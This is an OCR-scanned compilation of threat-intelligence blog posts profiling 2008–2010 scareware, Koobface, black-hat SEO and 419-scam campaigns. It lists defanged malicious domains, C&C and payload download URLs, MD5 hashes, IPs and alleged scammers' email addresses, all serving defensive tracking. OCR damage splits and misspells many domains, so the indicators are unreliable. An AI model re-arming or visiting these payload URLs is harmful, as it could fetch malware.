hxxp://dtqaczoi uswb.10fast.net 
hxxp://l lzozxoiigpw.10fast.net 
hxxp://n mcijkiuuobg.10fast.net 
hxxp://mnxij I iuusrm.10fast.net 
hxxp://q uuanbooikfy.10fast.net 



hxxp://xxzij huueuex.10fast.net 

hxxp://gsyepyeaaubk. 10fast.net 

hxxp://tqoaqmaoigsr. 10fast.net 

hxxp://cvboczi iikgp.10fast.net 

hxxp://gdyepteaancj. 10fast.net 

Sample malicious domains known to have 
participated in the campaign: 

hxxp://q ibocziuewuz.10fast.net 

hxxp://q rkargoaatsf.10fast.net 

hxxp://zzdey maoifyq.10fast.net 

hxxp://noeancoi utac.10fast.net 

hxxp://q unovnaaammb.10fast.net 

hxxp://gffugdeeei bk.10fast.net 

hxxp://cmvijsueen Is. 10fast.net 

hxxp://tqaeryeaanxj.10fast.net 

hxxp://xmuambi iifyt.10fast.net 

hxxp://cvnan neeesff.10fast.net 

hxxp://muuaq booolfy.10fast.net 
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hxxp://q imacvaaetyr.10fast.net 



h XX p: //vxf u t q aoihsw.lOfa st.net 
hxxp://ywreyruuuh hg.10fast.net 
hxxp://fdteyteeeoel. 10fast.net 
hxxp://ywianvoiu pwc.10fast.net 
hxxp://zlgeyraoobls. 10fast.net 
hxxp://zkh ujdeaojpm.10fast.net 
hxxp://kjfufdu uutqm.10fast.net 
hxxp://xxj udpueewiz.10fast.net 
hxxp://rooewmeaamcg. 10fast.net 
hxxp://hffugdueei nk.10fast.net 
hxxp://xmcoxzoi ikkd.10fast.net 
hxxp://l 11 izkuiifyq.10fast.net 
hxxp://xmuapsu iovnb.10fast.net 
hxxp://tq uanvoiuyqv.10fast.net 
hxxp://kvnartu uujlk.10fast.net 
hxxp://l I likhioozjf.10fast.net 
hxxp://yrreypeeamck. 10fast.net 
hxxp://g I hi hfueaeck.10fast.net 

Sample malicious domains known to have participate 
in the campaign: 



hxxp://goadult.info/go.php?sid = 13 -> -> 
hxxp://goadult.info/go.php?sid=9 - &gt -> 
hxxp://r2606.com/go/?pid = 30937 

-> which is a well known Koobface 1.0 command and control 
server domain. 

Related malicious redirectors known to have 
participated in the campaign: 

hxxp://goadult.info - 78.109.28.16 - tech(a)goadult.info 

hxxp://golgo.net - 174.36.214.32 - tech@golgo.net 

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info 
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Historical OSINT - Latvian ISPs, Scareware, and the 
Koobface Gang Connection (2018-10-20 22:34) 

It's 2010 and we've recently stumbled upon yet another 
malicious and fraudulent campaign courtesy of the Koobface 

gang actively serving fake security software also known as 
scareware to a variety of users with the majority of 

malicious software conveniently parked within 
79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP 
successfully 

hosting a diverse portfolio of fake security software. 

In this post, I'll provide actionable intelligence on the 
infrastructure behind the campaign and discuss in-depth 

the tactics techniques and procedures of the cybercriminals 
behind it. 



Sample malware known to have participated in the 
campaign: 

installer.l.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef 

- Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40 

(22.50 %) 

Related malicious phone back C &C server IPs: 

hxxp://av-pl usonline.org/install/avplus.dl I 

hxxp://av-plusonline.org/cb/real.php?id = 

Related malicious MD5s known to have participated 
in the campaign: 

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - 
FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %) 

It's gets even more interesting as hxxp://fast- 
payments.com - 91.188.59.27 is parked within Koobface 
bot¬ 
net's 1.0 phone back locations (hxxp://urodinam.net) and 
is also hosted within the same netblock at 91.188.59.10. 

Sample related malicious URLs known to have 
participated in the campaign: 

hxxp://urodinam.net/33t.php?stime=125558 

- hxxp://91.188.59.10/opa.exe -MD5: 
d4aacc8d01487285be564cbd3a4abc76- 
Downloader.VB.7.S; Mal/Koobface-B - 


Result: 10/40 (25 %) 



Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://aburvalg.com/newl.php - 64.27.0.237 

- hxxp://fucking-tube.net 

The following domains use it as a name server: 

hxxp://nsl.addedantivirus.com 

Related malicius domains known to have responded 
to the same malicious name server: 

hxxp://antivi ralpluss.org 

hxxp://antivi rspluss.org 

hxxp://avon I inescanerr.org 

hxxp://on I ine-scannerr.org 

hxxp://on I inescanerr.org 

hxxp://on I inescannerr.org 

hxxp://pretection-page.org 

hxxp://sys-mesage.org 

hxxp://av-pl US-on I ine.org 

hxxp://av-pl usonline.org 
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hxxp://avpl US-on I ine.org 
hxxp://avpl usonline.org 



hxxp://avpl ussonline.org 
hxxp://protecmesages.org 
hxxp://protect-mesagess.org 
hxxp://protectmesages.org 
hxxp://protectmesagess.org 
hxxp://protectmessages.org 
hxxp://avplus24su pport.com 
hxxp://search webway4.com 
hxxp://searchwebway5.com 
hxxp://search webway 10.com 
hxxp://search webway9.com 
hxxp://search webway6.com 

Related malicious URLs known to have participated 
in the campaign: 

hxxp://avplus-online.org/buy.php?id = 

- hxxp://fast-payments.com/index.php?prodid=antivirplus 
_02 _01 &afid = 

Related malicious domains known to have 
participated in the campaign: 

hxxp://antivi ruspluss.org 

hxxp://avplusscanner.org 



hxxp://protection-messag.org 
hxxp://antivirs-pl uss.org 
hxxp://antiviru-pl uss.org 
hxxp://antivi rus-pluss.org 
hxxp://protection-mesage.org 
h XX p://sy sste m-m esa g e. o rg 
hxxp://system-message.org 
hxxp://antivi ral-pluss.org 
hxxp://av-on I inescanner.org 
hxxp://avon I inescanner.org 
hxxp://avon I inescannerr.org 
hxxp://avp-scanner.org 
hxxp://avp-scan nerr.org 
hxxp://avp-sscaner.org 
hxxp://avp-sscan nerr.org 
hxxp://avplscaner-on I ine.org 
hxxp://avplscanerr-on I ine.org 
hxxp://avplsscan nerr.org 
hxxp://avplus-scanerr.org 
hxxp://on I ine-protection.org 



hxxp://antivi rupluss.org 
h XX p://sy ssmessage.org 
hxxp://avon I inescanerr.org 
hxxp://on I ine-scannerr.org 
hxxp://on I inescanerr.org 
hxxp://on I inescannerr.org 
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hxxp://av-scanal ly.org 
hxxp://av-scaner-on I ine.org 
hxxp://av-scaner-on I ine3k.org 
hxxp://av-scaner-on I ineband.org 
hxxp://av-scaner-on I inebody.org 
hxxp://av-scaner-on I inebuzz.org 
hxxp://av-scaner-on I inecabin.org 
hxxp://av-scaner-on I inecrest.org 
hxxp://av-scaner-on I inefolk.org 
hxxp://av-scaner-on I ineplan.org 
hxxp://av-scaner-on I inesite.org 
hxxp://iav-scaner-on I ine.org 
hxxp://netav-scaner-on I ine.org 




hxxp://techav-scaner-on I ine.org 
hxxp://antivi rspluss.org 
hxxp://sys-mesage.org 
hxxp://antivi ralpluss.org 
hxxp://pretection-page.org 
hxxp://av-scaner-on I inefairy.org 
hxxp://av-scaner-on I inegrinder.org 
hxxp://av-scaner-on I inehistory.org 
hxxp://av-scaner-on I ineicity.org 
hxxp://av-scaner-on I inemachine.org 
hxxp://av-scaner-on I inepeople.org 
hxxp://av-scaner-on I ineretort.org 
hxxp://av-scaner-on I inereview.org 
hxxp://av-scaner-on I inetopia.org 
hxxp://d irectav-scaner-online.org 
hxxp://expertav-scaner-on I ine.org 
hxxp://orderav-scaner-on I ine.org 
hxxp://speedyav-scaner-on I ine.org 
hxxp://th riftyav-scaner-online.org 
hxxp://ti mesav-scaner-online.org 




hxxp://4 lion I ine-scanner-free.org 
hxxp://dynaon I ine-scanner-free.org 
hxxp://faston I ine-scanner-free.org 
hxxp://homeon I ine-scanner-free.org 
hxxp://on I ine-scanner-freebin.org 
hxxp://on I ine-scanner-freebuy.org 
hxxp://on I ine-scanner-freelook.org 
hxxp://on I ine-scanner-freemap.org 
hxxp://on I ine-scanner-freemeet.org 
hxxp://on I ine-scanner-freesite.org 
hxxp://on I ine-scanner-freetent.org 
hxxp://on I ine-scanner-freeu.org 
hxxp://on I ine-scanner-freevolt.org 
hxxp://on I inescannerfree.org 
hxxp://av-pl US-on I ine.org 
hxxp://protecmesages.org 
hxxp://av-on I icity.org 
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hxxp://av-on I ine-scanner.org 
hxxp://av-on I ine-scannerbid.org 




hxxp://av-on I ine-scannercrest.org 
hxxp://av-on I ine-scannerfolk.org 
hxxp://av-on I ine-scannergate.org 
hxxp://av-on I ine-scannerland.org 
hxxp://av-on I ine-scannerpc.org 
hxxp://av-on I ine-scannersite.org 
hxxp://av-on I ine-scannerweek.org 
hxxp://av-on I ine-scannerwing.org 
hxxp://i nfoav-online-scanner.org 
hxxp://shopav-on I ine-scanner.org 
hxxp://theav-on I ine-scanners.org 
hxxp://avpl US-on I ine.org 
hxxp://protectmesages.org 
hxxp://av-scaner.org 
hxxp://av-scaners.org 
hxxp://av-scan ner.org 
hxxp://av-scan ners.org 
hxxp://avpl ussonline.org 
hxxp://avscaner.org 
hxxp://avscaners.org 




hxxp://avscan ner.org 
hxxp://avscan ners.org 
hxxp://eav-scaner.org 
hxxp://eav-scaners.org 
hxxp://eav-scan ner.org 
hxxp://eav-scan ners.org 
hxxp://myav-scaner.org 
hxxp://myav-scaners.org 
hxxp://myav-scan ner.org 
hxxp://myav-scan ners.org 
hxxp://protectmessages.org 
hxxp://avpl usonline.org 
hxxp://av-pl usonline.org 
hxxp://protect-mesagess.org 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Massive Scareware Dropping 
Campaign Spotted in the Wild (2018-10-20 22:38) 

It's 2008 and I've recently spotted a currently circulating 
malicious and fraudulent scareware-serving malicious 



domain portfolio which I'll expose in this post with the idea 
to share actionable threat intelligence with the security 

community further exposing and undermining the 
cybercrime ecosystem the way we know it potentially 
empowering 

security researchers and third-party vendors with the 
necessary data to stay ahead of current and emerging 
threats. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://50vi rus-scanner.com 

hxxp://700vi rus-scanner.com 

hxxp://anti virus-test66.com 

hxxp://antivi rus200scanner.com 

hxxp://antivi rus600scanner.com 

hxxp://anti virus800scanner.com 

hxxp://antivi rus900scanner.com 

hxxp://av-scan ner200.com 

hxxp://av-scan ner300.com 

hxxp://av-scan ner400.com 

hxxp://av-scan ner500.com 

hxxp://i netproscan031.com 



hxxp://i nternet-scan020.com 
hxxp://novi rus-scan00.com 
hxxp://stopvi rus-scanll.com 
hxxp://stopvi rus-scanl3.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan33.com 
hxxp://vi rus66scanner.com 
hxxp://vi rus77scanner.com 
hxxp://vi rus88scanner.com 
hxxp://anti virus-scan 200.com 
hxxp://antispy-scan200.com 
hxxp://av-scan ner200.com 
hxxp://av-scan ner300.com 
hxxp://anti virus-scan400.com 
hxxp://antispy-scan400.com 
hxxp://av-scan ner400.com 
hxxp://av-scan ner500.com 
hxxp://anti virus-scan600.com 
hxxp://antispy-scan600.com 
hxxp://anti virus-scan 700.com 



hxxp://antispy-scan700.com 
hxxp://av-scan ner700.com 
hxxp://antispy-scan800.com 
hxxp://anti virus-scan900.com 
hxxp://novi rus-scan00.com 
hxxp://stop-vi rus-010.com 
hxxp://spy warescan010.com 
hxxp ://antispywarehel p010.com 
hxxp://i nternet-scan020.com 
hxxp ://i nternet-scanner020.com 
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hxxp ://i nsight-scan20.com 
hxxp ://i nternet-scanner030.com 
hxxp ://stop-vi rus-040.com 
hxxp ://i nternet-scan040.com 
hxxp ://i nsight-scan40.com 
hxxp ://i nternet-scan050.com 
hxxp ://i nternet-scanner050.com 
hxxp ://i nsight-scan60.com 
hxxp ://stop-vi rus-070.com 



hxxp://i nternet-scan070.com 
hxxp://i nternet-scanner070.com 
hxxp://i nsight-scan80.com 
hxxp://stop-vi rus-090.com 
hxxp://i nternet-scan090.com 
hxxp://i nternet-scanner090.com 
hxxp://i nsight-scan90.com 
hxxp ://antispywarehel pkO.com 
hxxp://i netproscan001.com 
hxxp ://novi rus-scan01.com 
hxxp://spyware-stop01.com 
hxxp ://anti virus-inet01.com 
hxxp ://stopvi rus-scanll.com 
hxxp ://i netproscan031.com 
hxxp ://novi rus-scan31.com 
hxxp ://anti virus-inet31.com 
hxxp ://novi rus-scan41.com 
hxxp ://anti virus-inet41.com 
hxxp ://anti virus-inet51.com 
hxxp ://i netproscan061.com 



h XX p://n ovirus-scan61.com 
hxxp://i netproscan081.com 
hxxp://novi rus-scan81.com 
hxxp://i netproscan091.com 
hxxp://spyware-stopbl.com 
hxxp://spy ware-stopml.com 
hxxp://spyware-stopn 1 .com 
hxxp://spyware-stopzl.com 
hxxp ://antispywarehel p002.com 
hxxp ://antispywarehel p022.com 
hxxp ://novi rus-scan22.com 
hxxp ://antispywarehel pk2.com 
hxxp ://i nsight-scanner2.com 
hxxp://spywarescan013.com 
hxxp ://stopvi rus-scanl3.com 
hxxp ://novi rus-scan33.com 
hxxp://stopvi rus-scan33.com 
hxxp ://antispywarehel p004.com 
hxxp ://antispywarehel pk4.com 
hxxp://spywarescan015.com 



h XX p://n ovirus-scan55.com 
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hxxp://i nsight-scanner5.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan66.com 
hxxp ://antispywarehel pk6.com 
hxxp://spy warescan017.com 
hxxp ://i nsight-scanner7.com 
hxxp ://antispywarehel p008.com 
hxxp ://spy warescan018.com 
hxxp ://stopvi rus-scanl8.com 
hxxp ://novi rus-scan88.com 
hxxp ://stopvi rus-scan88.com 
hxxp ://anti virus-test88.com 
hxxp ://antispywarehel pk8.com 
hxxp ://i nsight-scanner8.com 
hxxp ://i nsight-scanner9.com 
hxxp://10scanantispyware.com 
hxxp://20scanantispyware.com 
hxxp://30scanantispyware.com 



hxxp://60scanantispyware.com 
hxxp://80scanantispyware.com 
hxxp://2scanantispyware.com 
hxxp://3scanantispyware.com 
hxxp://5scanantispyware.com 
hxxp ://7scanantispy ware.com 
hxxp://8scanantispyware.com 
hxxp ://spy ware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp ://50vi rus-scanner.com 
hxxp ://90vi rus-scanner.com 
hxxp ://antivi rus900scanner.com 
hxxp ://antivi ruslOscanner.com 
hxxp ://vi rus77scanner.com 
hxxp ://vi rus88scanner.com 
hxxp ://netOO lantivirus.com 
hxxp ://netO llantivirus.com 
hxxp ://netl llantivirus.com 



hxxp://net02 lantivirus.com 
hxxp://net-02antivi rus.com 
hxxp://net2 2 2antivirus.com 
hxxp://net-04antivi rus.com 
hxxp://net-05antivi rus.com 
hxxp://net-07antivi rus.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Malware Domains Impersonating 
Google (2018-10-20 22:51) 

lt"s 2008 and I've recently stumbled upon a currently active 
typosquatted portfolio of malware-serving domains suc¬ 
cessfully impersonating Google further spreading malicious 
software to hundreds of thousands of unsuspecting users. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://goog le-analyse.com/in.eg i?defau It 

hxxp://goog le-analystic.com/in.eg i 

hxxp://google-analysis.com/cgi-bin/nspl5/in.cgi?p = in 



hxxp://google-analystic.net 

hxxp://google-counter.com/cgi-bin/nspl?p = in 

hxxp://googlerank. info/counter/ 

hxxp://googlehlp.com 

hxxp://pagead2.googlesynidication.com 

hxxp://service-g oogle.cn 

hxxp://l.ie-goog le.cn 

hxxp://analystic.cn/in.cgi?default 

hxxp://255-google-video.info 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild (2018-10-21 22:35) 

It's 2008 and I recently came across to a pretty decent 
portfolio of rogue and fraudulent malicious scareware¬ 
serving 

domains successfully acquiring traffic through a variety of 
black hat SEO techniques in this particular case the airplane 

crash of the Polish president. 

Related malicious domains known to have 
participated in the campaign: 



hxxp://sarahscand ies.com 
hxxp://armadasur.com 
hxxp://gay ribisi.com 
hxxp://composerjoh nbeal.com 
hxxp://preferredtempsi nc.com 
hxxp://ojaivalleyboys.com 
hxxp://homel in kmag.com 
hxxp://world widestones.com 
hxxp://si lsilaqasmia.com 
hxxp://vidoemo.com 
hxxp://chan nhu.com 
hxxp://ideasenfoco.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://homeownersmoneysaver.com 

hxxp://preferredtempsi nc.com 

hxxp://sa rahscandies.com 

hxxp://chan nhu.com 

hxxp://i ntheclub.com 

hxxp://i nternetcabinetsdirect.com 



hxxp://si lentservers.com 

hxxp://ojaivalleyboys.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://i ndigo-post.com 

hxxp://jacksonaread iscgolf.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://werod ink.com 

hxxp://j ingyi-plastic.com 

hxxp://i mpressionsphotographs.com 

Sample URL redirection chain: 

hxxp://cooldesig ns4u.co.uk/sifr.php 

- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: 
johnvernet@gmail.com 

- hxxp://scaner24.org/?affid = 184 - 91.212.127.19 - Emai 
bobarter@xhotmail.net 

Redirectors parked on 213.163.89.55 (AS49544, 
INTERACTIVE3D-AS lnteractive3D) include: 

hxxp://google-analyze.org 

hxxp://al ioanka.com 
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hxxp://robokasa.com 

hxxp://thekapita.com 

hxxp://rbomce.com 

hxxp://kol koman.com 

hxxp://nikiten.com 

hxxp://rokobon.com 

hxxp://od ile-marco.com 

hxxp://ramualdo.com 

hxxp://omiardo.com 

hxxp://nsfer.com 

hxxp://racotas.com 

hxxp://foxtris.com 

hxxp://mongoit.com 

hxxp://mangasit.com 

hxxp://con vart.com 

hxxp://baid ustatz.com 

hxxp://google-analyze.cn 

hxxp://statanalyze.cn 

hxxp://reycross.cn 

hxxp://m-analytics.net 



hxxp://yahoo-analytics.net 

We've already seen hxxp://google-analyze.org and 
hxxp://yahoo-analytics.net in several related [l]mass com¬ 
promise of related Embassy Web Sites. 

We'll continue monitoring the campaign and post updates 
as new developments take place. 

1. httDs://ddanchev.blo as DOt.com/2017/05/historical-osint- 
inside-2007-2009.html 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild - Part Two (2018-10-21 22:47) 

It's 2008 and I've recently came across to a massive black 
hat SEO campaign successfully enticing users into falling 

victim into fraudulent and malicious scareware-serving 
campaign. In this post I'll provide actionable intelligence on 

the infrastructure behind it. 

Related malicious domains and redirectors known to 
have participated in the campaign: 

hxxp://msh-co.com 

hxxp://i ncubatedesign.com 

hxxp://i ncubatedesign.com 

hxxp://lancemissionart.com 

hxxp://aud ioboxstudios.com 





hxxp://h whitecustomhomes.com 
hxxp://i ndobestroof.com 
hxxp://in-prague.com 
hxxp://h vmpglobalconsulting.com 
hxxp://i ndierthanthou.com 
hxxp://h uckleberryroad.com 
hxxp://i ndiepoprockhop.com 
hxxp://i ndianfriends.org 
hxxp://h whitecustomhomes.com 
hxxp://h usuzem.com 
hxxp://h usuzem.com 
hxxp://sean kobuk.com 
hxxp://in-led.net 
hxxp://pel laiowahomes.com 
hxxp://i-leadzsite.com 
hxxp://sean kobuk.com 
hxxp://i4z.com 
hxxp://in-prague.com 
hxxp://tmnttoys.com 
hxxp://h ulshizer.com 



hxxp://aud ioboxstudios.com 

hxxp://msh-co.com 

hxxp://i-leadzsite.com 

hxxp://h ulshizer.com 

hxxp://msh-co.com 

hxxp://i ndierthanthou.com 

hxxp://neig hborhoodnursingcare.com 

hxxp://i4004.net 

hxxp://ndiepoprockhop.com 

hxxp://pugzor.net 

hxxp://i ndiepoprockhop.com 

hxxp://in-turkey.info 

hxxp://h whitecustomhomes.com 

hxxp://salsaspice.com 

hxxp://cal idogrocks.com 

hxxp://i ncubatedesign.com 

hxxp://iac-tokyo.org 

hxxp://h uckleberryroad.com 
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hxxp://in-prague.com 



hxxp://h ulshizer.com 

hxxp://neig hborhoodnursingcare.com 

hxxp ://indigo.earth man.ca 

hxxp://backyardcreations.org 

hxxp ://u raband.com 

hxxp ://h uckleberryroad.com 

hxxp ://i ndobestroof.com 

hxxp://i ndiepoprockhop.com 

hxxp://iac-tokyo.org 

hxxp ://i ndiansexhq.com 

hxxp ://cal idogrocks.com 

hxxp ://the-fl ooring-connection.com 

hxxp://pugzor.net 

hxxp ://the-fl ooring-connection.com 

hxxp://in-prague.com 

hxxp://iac-tokyo.org 

hxxp ://h umordehoy.com 

hxxp ://msh-co.com 

hxxp ://pel laiowahomes.com 

hxxp://salsaspice.com 



hxxp://lancemissionart.com 

hxxp://i ncubatedesign.com 

hxxp://iac-tokyo.org 

hxxp://tmnttoys.com 

hxxp://in-prague.com 

hxxp://backyardcreations.org 

hxxp://the-fl ooring-connection.com 

hxxp://sasm.net 

hxxp://i ndefenseof.com 

hxxp://u raband.com 

hxxp://i-need-a-websitedesig ned.com 

hxxp://h whitecustomhomes.com 

hxxp://scottiesautobody.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Rogue Scareware Dropping 
Campaign Spotted in the Wild Courtesy of the 
Koobface 


Gang (2018-10-21 23:02) 



It's 2010 and I've recently came across to a diverse portfolio 
of fake security software also known as scareware 

courtesy of the Koobface gang in what appears to be a 

[IJdirect connection between the gang's activities 
and the 

Russian Business Network. 

In this post I'll provide actionable intelligence on the 
infrastructure behind it and discuss in-depth the tactics 

techniques and procedures of the cybercriminals behind 
including the direction establishment of a direct connection 

between the gang's activities and a well-known Russian 
Business Network customer. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://piremover.eu/hitin.php?affid=02979 - 
212.117.161.142; 95.211.27.154; 95.211.27.166 

Once executed a sample malware (MD5: 
eedac4719229a499b3118f87f32fae35) phones back 
to the follow¬ 
ing malicious C &C server IPs: 

hxxp://xmiueftbmemblatlwsrj.cn/get.php7id=02979 - 
91.207.116.44 - Email: robertsimonkroon@gmail.com 

Known domains known to have responded to the 
same malicious C &C server IPs: 


hxxp://aahsd vsynrrmwnbmpklb.cn 



hxxp://d lukhonqzidfpphkbjpb.cn 
hxxp://bary kcpveiwsgexkitsg.cn 
hxxp://bfichgfqjq rtkwrsegoj.cn 
hxxp://d hbomnljzgiardzlzvkp.cn 

Once executed a sample malware phones back to the 
following malicious C &C service IPs: 

hxxp://xmi ueftbmemblatlwsrj.cn 

hxxp://urodinam.net - which is a [2]well known 

[3] Koobface 1.0 C &C server domain IP also seen in the " 

[4] Mass DreamHost Sites Compromise" exclusively 
profiled in this post. 

hxxp://xmi ueftbmemblatlwsrj.cn 

Once 

executed 

a 

sample 

malware 

MD5: 

66dc85ad06e4595588395b2300762660; 

MD5: 

91944c3ae4a64c478bfba94e9e05b4c5 phones back 
to the following malicious C &C server IPs: 



hxxpV/proxim.ntkrnlpa.info - 83.68.16.30 - seen and 
observed in related analysis regarding the [5]mass 
Embassy 

Web site compromise throughout 2007 and 2009. 

Successfully dropping the following malicious Koobface MD5 

hxxp://harmonyhudospa.se/.sys/?getexe=f b.70.exe 

Related malicious MD5s (MD known to have 
participated in the campaign: 

MD5: 66dc85ad06e4595588395b2300762660 

MD5: 8282ea8e92f40eel3ab716daf2430145 

Once executed a sample malware phones back to the 
following malicious C &C server IPs: 

hxxp://tehnocentr.ch ita.ru/.sys 

hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

1. httDs://ddanchev.blo as DOt.com/2017/05/historical-osint- 
inside-2007-2009.html 

2 . httDs://draft. blo aa er.com/ 
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3. httDs://ddanchev.blo as DOt.com/2010/05/koobface- a an a- 
resDonds-to-10-thin as- vou.html 

4. httDs://ddanchev.blo as DOt.com/2010/05/dissectin g -mass- 
dreamhost-sites.html 
















5. httDs://ddanchev.blo as DOt.com/2017/05/historical-osint- 
inside-2007-2009.html 
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Historical OSINT - Profiling a Portfolio of Active 419- 
Themed Scams (2018-10-21 23:08) 

It's 2010 and I've recently decided to provide actionable 
intelligence on a variety of 419-themed scams in particular 

the actual malicious actors behind the campaigns with the 
idea to empower law enforcement and the community 

with the necessary data to track down and prosecute the 
malicious actors behind these campaigns. 

Related malicious and fraudulent emails known to 
have participated in the campaign: 

david _ikemba@supereme-loan-finance.com - 96.24.14.4 

charles.maynardl@gmx.com - 218.31.134.111 

mr.karimahmed2004@msn.com - 41.203.231.82 

fedexdelivryservices@yahoo.com.hk - 89.187.142.72 

chevrondisbursement@hotmail.com - 41.138.182.245 

mrslindahilldeskOOOOO@hotmail.co.uk - 41.138.188.45 

natt.westt@live.com - 115.242.40.142 

googlellanniversary2010@live.com - 115.240.21.112 

barjamessmith@qatar.io - 115.242.94.153 





delata _ecobank@web2mail.com - 202.58.64.18 

junhuan9@yahoo.cn - 68.190.243.51 

fairlandindustryltd@mail.ru - 41.138.190.213 

shkhougal@aol.com - 80.35.222.9 

jamestimeswel@rogers.com - 203.170.192.4 

alimubarakhm@hotmail.com - 115.134.5.245 

godwinemefiele2010@hotmail.com - 41.211.229.65 

skyebankplclagosnigera@gmail.com, 
skyebankplclagosnigera@zapak.com - 41.138.178.241 

contact.alcchmb@sify.com - 116.206.153.50 

officelottery94@yahoo.com.hk - 124.122.145.226 

kadamluk@live.com - 41.217.65.14 

garycarsonuk@w.cn - 220.225.213.221 

Stella _willson48@yahoo.co.uk - 82.196.5.120 

trustlink@w.cn - 87.118.82.8 

george201009@hotmail.com - 59.120.137.197 

drmannsurmuhtarrr_155@yahoo.cn, 
mrstreasurecollinnsss@gmail.com - 82.114.78.222 
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Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild (2018-10-21 23:21) 



It's 2010 and I've recently stumbled upon yet another 
diverse portfolio of blackhat SEO domains this time serving 

rogue security software also known as scareware to 
unsuspecting users with the cybercriminals behind the 
campaign 

successfully earning fraudulent revenue in the process of 
monetizing access to malware-infected hosts largely relying 

on the utilization of an affiliate-network based type of 
revenue sharing scheme. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on the in¬ 
frastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://arnald uatis.com 

hxxp://batistal uciano.com 

hxxp://bethemed ia.net 

hxxp://bride-beautiful.com 

hxxp://bu rgessandsons.com 

hxxp://carol inacane.com 

hxxp://cau lfieldband.com 

hxxp://i mprovenewark.com 

hxxp://marsmel low. info 



hxxp://nood lesonline.com 

hxxp://q ueenslumber.com 

hxxp://thesol idwoodflooringcompany.com 

hxxp://wi relessexpertise.com 

hxxp://bigbangexpress.com 

hxxp://bioresonantie.net 

hxxp://clubipg.com 

hxxp://djdior.com 

hxxp://djektoyz.com 

hxxp://getraen kepool.com 

hxxp://hartman pescar.com 

hxxp://hetkaash uis.com 

hxxp://menno.info 

hxxp://pianoaccompan istcompetition.com 
hxxp://sou ndwitness.org 
hxxp :/strij kvrij .com 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Drops Scareware (2018-10-21 
23:37) It's 2010 and I've recently intercepted a currently 
active malicious and fraudulent blakchat SEO campaign 



successfully enticing users into interacting with rogue and 
fraudulent sea reware-serving malicious and fraudulent 
campaigns. 

In this post I'll profile the infrastructure behind the 
campaign and provide actionable intelligence on the in¬ 
frastructure behind it. 

Sample URL redirection chain: 

hxxp://noticexsummary.com/re.php?lnk= 1203597664 - 
87.255.55.231 

- hxxp://new-pdf-reader.com/l/promo/index.asp?aff=11677 - 
66.207.172.196 

= hxxps://secu re-signupway.com/promo/join.aspx? 
siteid = 3388 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://noticexsu mmary.com/ 

Related malicious domains known to have 
participated in the campaign: 

hxxp ://on I ine-tv-on-your-pc.com/p2/index.asp7aff =11680 
&camp=unsub 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Yet Another Massive Blackhat SEO 
Campaign Spotted in the Wild Drops Scareware 



(2018-10-21 23:47) 

It's 2010 and I've recently came across to a currently active 
malicious and fraudulent blackhat SEO campaign success¬ 
fully enticing users into interacting with rogue and 
fraudulent sea reware-serving malicious and fraudulent 
campaigns. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://g lobals-advers.com 

hxxp://al Id iskscheck300.com 

hxxp://mu ltisearchl.com 

hxxp://myfreespace3.com 

hxxp://hottystars.com 

hxxp://mu ltilangl.com 

hxxp://3gigabytes.com 

hxxp://d rivemedirect.com 

hxxp://g lobala2.com 

hxxp://teled isons.com 

hxxp://theworld news5.com 

hxxp://vi rtualblog5.com 



hxxp://g rander5.com 
hxxp://5starsblog.com 
hxxp://g lobalreds.com 
hxxp://g lobal-advers.com 
hxxp://ratemyblogl.com 
hxxp://g reatvideo3.com 
hxxp://beg in ner2009.com 
hxxp://fastweb way.com 
hxxp://blazervi ps.com 
hxxp://beg in2009.com 
hxxp://megatradetds0.com 
hxxp://secu redonlinewebspace.com 
hxxp://proweb-i nfo.com 
hxxp ://secu rity-www-cl icks.com 
hxxp://u pdatedownloadlists.com 
hxxp ://styleon lyclicks.cn 
hxxp ://i nformationgohere.com 
hxxp ://world-cl ick-service.com 
hxxp ://secutitypowercl icks.cn 
hxxp://secu redd ickuser.cn/ 



hxxp://sl ickoverview.com 

hxxp://viewyou rclicks.com 

hxxp://cl ickwww2.com 

hxxp://cl ickadsystem.com 

hxxp://becomepoweruser.cn 

hxxp://cl ickoverridesystem.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://protecteduser.cn 
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hxxp://i nternetprotectedweb.com/ 

hxxp://cl icksadssystems.com 

hxxp://whereismycl ick.cn 

hxxp://trustou rclicks.cn 

hxxp://goldenstarcl ick.cn 

hxxp://defended systemuser.cn 

Related malicious domains known to have 
participated in the campaign: 

hxxp://d rivemedirect.com 

hxxp://vi rtualblog5.com 

hxxp://fastweb way.com 



